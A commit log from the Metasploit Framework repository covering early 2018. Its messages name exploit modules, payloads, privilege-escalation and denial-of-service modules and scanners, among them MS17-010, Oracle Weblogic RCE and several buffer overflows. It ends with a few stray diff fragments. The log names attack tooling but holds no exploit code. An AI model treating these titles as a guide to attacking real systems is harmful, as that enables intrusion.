bwatters-r7	9be7bc9b21	Land #9665 , Add missing reverse_tcp_rc4 payload tests. Merge branch 'land-9665' into upstream-master	2018-03-05 15:29:21 -08:00
William Vu	d3b4f91b4c	Land #9671 , missed code from TelnetEnable refactor	2018-03-05 15:29:21 -08:00
Jon Hart	6909c635bc	Land #9644 , @xistence's memcached stats amplification scanner	2018-03-05 15:29:20 -08:00
Brent Cook	31bf6d1bd0	Land #9669 , fix SSL cert generation in provider	2018-03-05 15:29:20 -08:00
h00die	2731b91036	Land #9658 spelling and grammar fixes	2018-03-05 07:42:48 -08:00
h00die	e57a1fbd43	Land #9650 netgear telnetenable exploit	2018-03-05 07:42:48 -08:00
h00die	d5edb566f5	Land #9661 fix for heart logo	2018-03-05 07:42:48 -08:00
bwatters-r7	00d5fcfd97	ReLand #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm This reverts commit `7964868fcd`.	2018-03-02 17:46:46 -06:00
Jacob Robles	0c86296d99	Land #9659 , fix typo in comment	2018-03-02 17:46:21 -06:00
bwatters-r7	d2150c8d15	Revert "Land #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm" This reverts commit `fcc579377f`, reversing changes made to `95cd149378`.	2018-03-02 17:45:58 -06:00
bwatters-r7	4841f29190	Land #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm	2018-03-02 16:41:33 -06:00
h00die	6060549512	Land #9654 msf heart logos	2018-03-02 16:41:33 -06:00
Jon Hart	b63a018509	Land #9596 , fixes #9592 , broken NTP DRDoS modules	2018-03-02 16:41:24 -06:00
Brent Cook	4839e8e7c8	Land #9647 , lock protobuf version	2018-03-01 15:40:04 -06:00
Metasploit	80f34c9b2d	Bump version of framework to 4.16.44	2018-03-01 10:03:02 -08:00
William Vu	3fd2862f76	Land #9639 , multi/handler exit on disabled handler If DisablePayloadHandler is set, abort instead of hanging.	2018-03-01 07:48:02 -08:00
Metasploit	096ca90953	Bump version of framework to 4.16.43	2018-03-01 07:32:21 -08:00
Sonny Gonzalez	667cc5bcca	Land #9653 , fix Y2k38 issue (until Jan 1, 2038)	2018-03-01 09:28:11 -06:00
Jeffrey Martin	789034a06c	Land #9638 , treat 'password must change' as a successful login	2018-02-28 13:25:22 -08:00
h00die	b2f112fd2b	Land #9641 spelling fix for wmap rc	2018-02-28 08:50:01 -08:00
William Vu	fac7f3d5be	Fix #9602 , a little defensive programming Check for a nil message and unnecessary auth failures while looping.	2018-02-26 18:08:37 -06:00
Brent Cook	95a5ebc1e7	Land #9629 , decouple hosts and targets for tests	2018-02-26 16:07:16 -08:00
Wei Chen	735fbc5c9f	Land #9623 , Support Win 2008/7+ for enum_ms_product_keys Land #9623	2018-02-25 23:25:03 -08:00
h00die	fc8cafe81a	Land #9310 docs for many aux scanners	2018-02-25 23:25:02 -08:00
Brent Cook	bffba1e5e3	Land #9607 , upgrade osx shells to osx meterpreter	2018-02-25 23:25:02 -08:00
Metasploit	3021a3202b	Bump version of framework to 4.16.42	2018-02-23 08:57:01 -08:00
William Vu	0a5e9d922f	Land #9601 , ms17_010_eternalblue reliability fixes	2018-02-23 08:31:02 -08:00
Brent Cook	2af4f56382	Land #9611 , Fix bug causing all OWA logins to appear valid	2018-02-23 08:31:01 -08:00
bwatters-r7	ac6fede928	Land #9441 , Create exploit for AsusWRT LAN RCE Merge branch 'land-9441' into upstream-master	2018-02-23 08:31:01 -08:00
Metasploit	c7cd9ca395	Bump version of framework to 4.16.41	2018-02-22 10:05:34 -08:00
Brent Cook	fd029eda62	lock ruby_smb to 0.0.18 to match master	2018-02-22 11:13:12 -06:00
Jacob Robles	178afdaed1	Land #9604 , Fix logged errors when running without Python 3.6 / gmpy2	2018-02-22 08:27:37 -08:00
Brent Cook	a189673782	Land #9584 , Fix reverse_php_ssl infinite loop	2018-02-22 08:27:36 -08:00
Brent Cook	826b986018	Land #9602 , Create sessions with the Fortinet SSH backdoor scanner	2018-02-22 08:27:36 -08:00
Brent Cook	4e8fe54c6c	Land #9524 , prefer 'shell' channels over 'exec' channels for ssh CommandStream	2018-02-22 08:27:36 -08:00
William Vu	c1d701f656	Land #9593 , finger_users regex fix	2018-02-22 08:27:35 -08:00
Aaron Soto	dc913b60e4	Land #9444 - `hsts_eraser` module and docs	2018-02-22 08:27:35 -08:00
Jacob Robles	40220b5ab6	Land #9594 , CloudMe Sync v1.10.9 Buffer Overflow	2018-02-22 08:27:35 -08:00
Jacob Robles	72cb9f358e	Land #9561 , Disk Savvy Enterprise v10.4.18 built-in server buffer overflow	2018-02-22 08:27:34 -08:00
Brent Cook	eb54ae4ec0	Land #9589 , add some more payload specs	2018-02-20 10:18:22 -08:00
Brent Cook	3635a92f5a	Land #9588 , Fix silent fail on missing argument to wmap_sites -d idx	2018-02-20 09:24:55 -06:00
Brent Cook	af8736cad6	Land #9585 , fix ctrl-D handling with block continuation	2018-02-20 09:24:54 -06:00
Brent Cook	72efbb9534	Land #9583 , move osx stage binary	2018-02-20 09:24:54 -06:00
Brent Cook	d614e06bfa	Land #8997 , add local 'ls' support to Meterpreter sessions	2018-02-20 09:24:54 -06:00
Brent Cook	59a41f04f7	Land #9366 , Add x64 staged Meterpreter for macOS	2018-02-20 09:24:41 -06:00
Brent Cook	8c2484d2da	Land #9164 , add OWA 2016 support	2018-02-20 09:24:13 -06:00
Chris Higgins	d2c203bcb9	Lands #9504 , MagniComp SysInfo privilege escalation	2018-02-20 09:24:13 -06:00
Brent Cook	13c8072bca	Land #9505 , Support local knowledge base documents	2018-02-20 09:24:12 -06:00
Brent Cook	5dede95e98	Land #9270 , Implement plugin API for hooking database events	2018-02-20 09:24:12 -06:00
Brent Cook	2395f839d0	Land #9507 , Expand paths for meterpreter's cp, mv, and rm commands	2018-02-20 09:24:12 -06:00
Brent Cook	a27b2bff3c	Land #9443 , Add warning to FileDropper for deleting CWD	2018-02-20 09:24:11 -06:00
Brent Cook	f581942c7f	Land #9575 , Fix wmap_sites -a exception on missing url	2018-02-18 20:27:53 -08:00
Brent Cook	b3962c73b0	Land #9573 , fixes for bind_named_pipe	2018-02-18 20:27:53 -08:00
Brent Cook	2d10a9a201	Land #9568 , handle mismatch uid/gids in docker images	2018-02-18 20:27:53 -08:00
Brent Cook	0b719772cb	Land #9572 , add bind_named_pipe tests	2018-02-18 15:32:11 -08:00
Brent Cook	d89a8c3eb9	Land #9571 , specify a python encoding for the claymore DoS module	2018-02-16 15:34:49 -08:00
Brent Cook	f055bccc2a	Land #9570 , properly handle when there is no stat callback specified on upload	2018-02-16 15:34:49 -08:00
Brent Cook	51a685bcc7	Land #9516 , Support Bash-Style Continuation Lines	2018-02-16 15:34:48 -08:00
Brent Cook	d2e71cfc8b	Land #9512 , Add Claymore Dual GPU Miner<= 10.5 DoS module	2018-02-16 15:34:48 -08:00
Brent Cook	60e37e1c78	Land #9562 , avoid an error with aux module command dispatcher	2018-02-16 15:34:48 -08:00
Brent Cook	31ed50ac92	Land #9539 , add bind_named_pipe transport to Windows meterpreter	2018-02-16 15:34:47 -08:00
Wei Chen	004e228a52	Land #9509 , Ulterius Server < v1.9.5.0 Directory Traversal Land #9509	2018-02-16 15:34:47 -08:00
Brent Cook	e8ad3a98e9	Land #9558 , Fix #9417 , map timeout exp to a var for telnet_encrypt_overflow	2018-02-15 14:14:07 -08:00
Brent Cook	b9a8f227fb	Land #9533 , Add output file support to the vulns command	2018-02-15 14:14:07 -08:00
Brent Cook	87dcb13413	update magic numbers	2018-02-15 15:25:47 -06:00
Brent Cook	1045c1fc11	Land #9564 , honoring retry counts for x86/64 Windows reverse_tcp payloads	2018-02-15 13:22:56 -08:00
Brent Cook	c5a73bdea3	Land #9563 : improve memory usage on meterpreter file upload	2018-02-15 13:22:55 -08:00
Brent Cook	7cde510eb6	Land #9560 , Fix undef method 'gsub' in bavision_cam_login	2018-02-15 13:22:55 -08:00
Metasploit	358954e15c	Bump version of framework to 4.16.40	2018-02-15 10:03:12 -08:00
Brent Cook	0cee8485d0	Land #9557 , add back udp_probe for now	2018-02-14 11:26:59 -08:00
Spencer McIntyre	bdc0b47844	Land #9552 , add private_type for stored tomcat pw Fixes #9513	2018-02-13 19:55:54 -08:00
Jeffrey Martin	aecc1f143f	Land #7699 , Add UDP handlers and payloads (redux)	2018-02-13 14:46:07 -08:00
Jacob Robles	f281b45384	Land #9546 , Correct Typo	2018-02-13 14:46:07 -08:00
Jacob Robles	e485b152e3	Land #9542 , Correct Typo	2018-02-13 14:46:06 -08:00
Jeffrey Martin	1126acb201	Land #9543 , bump gems, remove rbnacl/ffi since unneeded	2018-02-12 11:57:18 -06:00
h00die	37cb2d77e7	Land #9422 abrt race condition priv esc on linux	2018-02-12 11:55:21 -06:00
Pearce Barry	6c3168c541	Land #9536 , Add Ubuntu notes to documentation	2018-02-12 11:55:19 -06:00
Pearce Barry	73bcec5d11	Land #9408 , Add Juju-run Agent Privilege Escalation module (CVE-2017-9232)	2018-02-12 11:55:19 -06:00
h00die	090f7c8bd6	Land #9467 linux priv esc against glibc origin	2018-02-12 11:55:19 -06:00
Wei Chen	72ed11574b	Land #9532 , Fix a bug in the MD docs references Land #9532	2018-02-12 11:55:18 -06:00
h00die	cd7187023c	Land #9469 linux local exploit for glibc ld audit	2018-02-12 11:55:18 -06:00
Brent Cook	32bd516e70	Land #9525 , Update mysql_hashdump for MySQL 5.7 and above	2018-02-12 11:55:17 -06:00
Jacob Robles	656eb1150a	Land #9489 , Add scanner for the Bleichenbacker oracle (AKA: ROBOT)	2018-02-09 16:11:57 -06:00
Metasploit	55ae1f7bbe	Bump version of framework to 4.16.39	2018-02-09 09:49:50 -08:00
Pearce Barry	4d4538dceb	Merge pull request #9531 from pbarry-r7/4.x-pick-up-ROBOT Cherry-pick from master for 4.x (pick up ROBOT). Using green GH button because I effed up my cmdline... :/	2018-02-09 11:37:16 -06:00
Adam Cammack	cd723ac86e	Add scanner for Bleichenbacher oracle (ROBOT)	2018-02-09 11:14:30 -06:00
Adam Cammack	b0da7fcd26	Add Enum-type options for external modules	2018-02-09 11:14:21 -06:00
Adam Cammack	0fe2fb9186	Add support for single-IP external scanners	2018-02-09 11:14:14 -06:00
Metasploit	a7e779d987	Bump version of framework to 4.16.38	2018-02-08 10:04:59 -08:00
Brent Cook	b696665adc	Land #9478 , Improve Dup Scout BOF exploit	2018-02-08 10:25:39 -06:00
Brent Cook	909b787a56	Land #9521 , flush pipe buffers when a process exists in mettle	2018-02-08 10:25:25 -06:00
h00die	5457cec81c	Land #9493 updates to various docs	2018-02-06 23:33:58 -06:00
scriptjunkie	64c0d60fbf	Land #9492 , fix for reverse port forwards	2018-02-06 23:33:52 -06:00
Matthew Kienow	49c9b3cf1e	Land #9491 , remove extra HTML from doc templates	2018-02-06 23:33:51 -06:00
Adam Cammack	e82ff28374	Land #9490 , Fix HTML escaping of Unicode in docs	2018-02-06 23:33:34 -06:00
Metasploit	1fdc4bdabb	Bump version of framework to 4.16.37	2018-02-02 09:51:35 -08:00
William Vu	6c350be24e	Land #9473 , new MS17-010 aux and exploit modules	2018-02-02 11:32:40 -06:00
h00die	016af01fd8	Land #9399 a linux priv esc against apport and abrt	2018-02-02 11:32:29 -06:00
Brent Cook	ce3d5d77e4	Land #9481 , Update native DNS spoofer for Dnsruby	2018-02-02 11:32:18 -06:00
Brent Cook	ec12d61702	Land #9354 , Debut embedded httpd server (Brother printers) DoS	2018-02-02 11:31:59 -06:00
Metasploit	445b72fdcd	Bump version of framework to 4.16.36	2018-02-01 10:03:16 -08:00
Brent Cook	48c3c7cd62	Land #9475 , Fix import for Fix proxy authentication in reverse_http	2018-02-01 11:24:10 -06:00
bwatters-r7	64746d8325	Land # 9407, Add BMC Server Automation RSCD Agent RCE exploit module Merge branch 'land-9407' into upstream-master	2018-02-01 11:23:59 -06:00
h00die	b7fbffa331	Land #9445 fixes for ssl labs scanner module	2018-02-01 11:23:46 -06:00
Jacob Robles	4fa68f29d9	Land #9457 , Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow	2018-02-01 11:23:26 -06:00
Christian Mehlmauer	a9d4a98d80	Land #9470 , Update docker image dependencies fix #8211	2018-02-01 11:22:51 -06:00
Metasploit	cca76d2217	Bump version of framework to 4.16.35	2018-01-26 16:18:28 -08:00
William Vu	bff02efad4	Land #9466 , metasploit-payloads bump to 1.3.28	2018-01-26 18:09:20 -06:00
Aaron Soto	395320ba97	Land #9379 , Oracle Weblogic RCE exploit and documentation	2018-01-26 18:08:56 -06:00
William Vu	a87ae41d81	Land #9446 , Post API fix for setuid_nmap	2018-01-26 18:08:47 -06:00
Jeffrey Martin	0d98135fcb	Land #9462 , add missing payload tests	2018-01-26 18:08:34 -06:00
Metasploit	c2379308cf	Bump version of framework to 4.16.34	2018-01-25 10:04:45 -08:00
bwatters-r7	af0c58c2ae	Land #9335 , Added socket bind port option for reverse tcp payload. Merge branch 'land-9335' into upstream-master	2018-01-24 17:20:14 -06:00
Matthew Kienow	b515a582f0	Land #9424 , Add SharknAT&To external scanner	2018-01-24 17:20:03 -06:00
Brent Cook	25652c6c17	add missing gemfile.lock update	2018-01-24 17:19:06 -06:00
Pearce Barry	926ce42a01	Land #8632 , colorado ftp fixes	2018-01-24 17:13:20 -06:00
bwatters-r7	2ea9ab2625	Land #9416 , Sync Breeze Enterprise 9.5.16 Import Command buffer overflow Merge branch 'land-9416' into upstream-master	2018-01-24 17:13:16 -06:00
Adam Cammack	a4022f7b8f	Land #9430 , Improve Hyper-V checkvm checks	2018-01-24 17:13:12 -06:00
bwatters-r7	06b702e86b	Land #9449 , bump metasploit-payloads from 1.3.25 to 1.3.27 rapid7/metasploit-payloads#264 rapid7/metasploit-payloads#263 Merge branch 'land-9449' into upstream-master	2018-01-24 17:13:08 -06:00
bwatters-r7	8f2de5cd41	Land #9205 , Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143) Merge branch 'land-9205' into upstream-master	2018-01-24 17:13:05 -06:00
bwatters-r7	a136841794	Land #9114 , Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) Merge branch 'land-9114' into upstream-master	2018-01-24 17:13:00 -06:00
Brent Cook	15f631dcb5	Land #9452 , expose linux/osx meterpreter process hiding	2018-01-24 17:12:56 -06:00
Brent Cook	d6beb94c59	Land #6611 , add native DNS to Rex, MSF mixin, sample modules	2018-01-24 17:12:52 -06:00
Brent Cook	5ec3da843e	Land #9349 , GoAhead LD_PRELOAD CGI Module	2018-01-24 17:12:47 -06:00
Brent Cook	294a8e0ada	Land #9413 , Expand the number of class names searched when checking for an exploitable JMX server	2018-01-24 17:12:43 -06:00
Brent Cook	bb73d2c07e	Land #9431 , Fix owa_login to handle inserting credentials for a hostname	2018-01-24 17:12:39 -06:00
Brent Cook	47682e3f37	Land #9404 , update module author	2018-01-24 17:12:34 -06:00
Brent Cook	5fc1988d63	Land #9398 , allow UTF-8 module names and authors	2018-01-24 17:12:30 -06:00
Wei Chen	ab610f599b	Land #9442 , Remove NoMethod Rescue for cerberus_sftp_enumusers Land #9442	2018-01-24 17:12:25 -06:00
William Vu	7da3bdd081	Land #9432 , cmd_edit improvements (again!) We seem to enjoy refactoring this method.	2018-01-24 17:12:20 -06:00
Wei Chen	10fafb62bb	Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil Land #9436 Thanks Steve!	2018-01-24 17:12:16 -06:00
Brent Cook	512192d3b0	Land #9267 , Add targets to sshexec	2018-01-24 17:12:12 -06:00
Brent Cook	55c345418d	Land #9438 , address cmd_exec inconsistencies	2018-01-24 17:11:40 -06:00
Brent Cook	b8fc2c0213	Land #9389 , Update commvault_cmd_exec module documentation	2018-01-24 17:11:34 -06:00
Brent Cook	23619431aa	update stageless python sizes	2018-01-24 17:08:51 -06:00
Brent Cook	0916d8402e	fix whitespace patchups for current python meterpreter	2018-01-24 17:08:33 -06:00
Jeffrey Martin	bf6540585f	lock google-protobuf and grpc on 4.x	2018-01-19 16:15:09 -06:00
Metasploit	898aa82933	Bump version of framework to 4.16.33	2018-01-18 10:05:22 -08:00
@@ -1 +1 @@
 .3.8
 .4.3
				`@@ -1 +0,0 @@`
				`This directory contains ActiveRecord concerns, models and validators.`